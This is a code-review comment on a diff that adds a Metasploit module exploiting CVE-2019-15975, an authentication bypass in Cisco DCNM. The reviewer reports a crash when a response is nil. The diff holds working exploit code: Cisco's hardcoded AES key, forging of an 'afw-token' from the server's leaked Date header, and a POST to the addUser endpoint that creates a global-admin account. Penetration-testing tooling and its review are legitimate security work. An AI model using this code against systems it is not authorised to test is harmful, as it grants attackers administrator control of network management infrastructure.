modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb

```diff
@@ -0,0 +1,166 @@
+          After that, you can login to the web interface with those credentials.
+          The only necessary condition is the more or less recent connection of an admin as this exploit
+          uses a kind of session stealing.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'MR_ME', # Amazing POC on www.exploit-db.com
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'CVE', '2019-15975'],
+            [ 'EDB', '48018']
+          ],
+        'DisclosureDate' => '2020-06-01',
+        'DefaultOptions' => { 'SSL' => true }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptInt.new('RETRIES', [true, 'Retry count for the attack', 50]),
+      OptString.new('TARGETURI', [true, 'The base path of the Cisco DCNM', '/']),
+      OptString.new('USERNAME', [true, 'The username of the admin account you want to add', Faker::Internet.username(specifier: 8..10, separators: [])]),
+      OptString.new('PASSWORD', [true, 'The password of the admin account you want to add', Faker::Internet.password(min_length: 8, max_length: 10)])
+    ])
+  end
+
+  KEY = 's91zEQmb305F!90a'.freeze
+
+  class AESCipher
+    def initialize
+      # Cisco's hardcoded key
+      @bs = 16
+    end
+
+    def encrypt(raw)
+      raw = _pad(raw)
+      iv = "\x00" * 0x10
+      cipher = OpenSSL::Cipher.new('aes-128-cbc')
+      cipher.encrypt
+      cipher.key = KEY
+      cipher.iv = iv
+      Base64.encode64(cipher.update(raw))
+    end
+
+    private
+
+    def _pad(size)
+      size + (@bs - size.length % @bs).chr.to_s * (@bs - size.length % @bs)
+    end
+  end
+
+  def make_raw_token
+    key = 'what_a_nice_key'
+    uuid = SecureRandom.uuid.gsub('-', '')[0..20]
+    time = leak_time
+    raw_token = format('%<key>s-%<uuid>s-%<time>s', key: key, uuid: uuid, time: time)
+    raw_token
+  end
+
+  def bypass_auth(token, usr, pwd)
+    d = {
+      'userName' => usr,
+      'password' => pwd,
+      'roleName' => 'global-admin'
+    }
+    h = { 'afw-token' => token }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'headers' => h,
+      'vars_post' => d,
+      'uri' => normalize_uri(target_uri.path + 'fm/fmrest/dbadmin/addUser')
+    })
+
+    if r.body != 'Access denied'
+
+      json = r.get_json_document
+
+      case json&.dig('resultMessage')
+      when 'Success'
+        return :success
+      when 'User already exists.'
+        return :user_already_exists
+      when 'Cannot add user since password strength check failed'
+        return :weak_password
+      end
+    else
+      return :failed_to_connect
+    end
+    :fail
+  end
+
+  def leak_time
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')
```

Comment:
I went to go and test this module and there's a bug here where `r` is nil sometimes causing it to crash.

```
[-] Auxiliary failed: NoMethodError undefined method `headers' for nil:NilClass
[-] Call stack:
[-]   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb:120:in `leak_time'
[-]   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb:76:in `make_raw_token'
[-]   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb:128:in `block in add_admin_account'
[-]   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb:127:in `times'
[-]   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb:127:in `add_admin_account'
[-]   /home/smcintyre/Repositories/metasploit-framework.pr/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb:155:in `run'
[*] Auxiliary module execution completed
msf6 auxiliary(admin/networking/cisco_dcnm_auth_bypass) >
```

This needs to be updated to check if the response is nil and handle it appropriately.